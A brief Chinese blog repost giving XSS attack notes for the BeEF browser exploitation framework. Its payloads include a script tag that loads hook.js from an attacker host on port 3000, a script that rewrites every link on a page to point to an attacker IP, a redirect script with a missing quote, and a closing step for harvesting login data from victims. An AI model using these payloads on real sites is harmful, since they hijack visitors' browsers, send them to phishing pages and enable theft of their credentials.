其他分享
首页 > 其他分享> > xss与beef

xss与beef

作者:互联网

启动beef和apache

修改主页,在网页中添加

<script src='http://IP:3000/hook.js'></script>

 

xss漏洞利用

篡改网页a标签中的连接

<script>
window.onload = function(){
var link = document.getElementsByTagName("a");
for(j = 0; j < link.length; j++){
link[j].href = "http://IP";}
}
</script>

跳转到目标网页

<script>window.location='http://ip</script>

 

目标登录网页获取信息

 

标签:xss,网页,beef,window,link,http
来源: https://www.cnblogs.com/f1veseven/p/13282932.html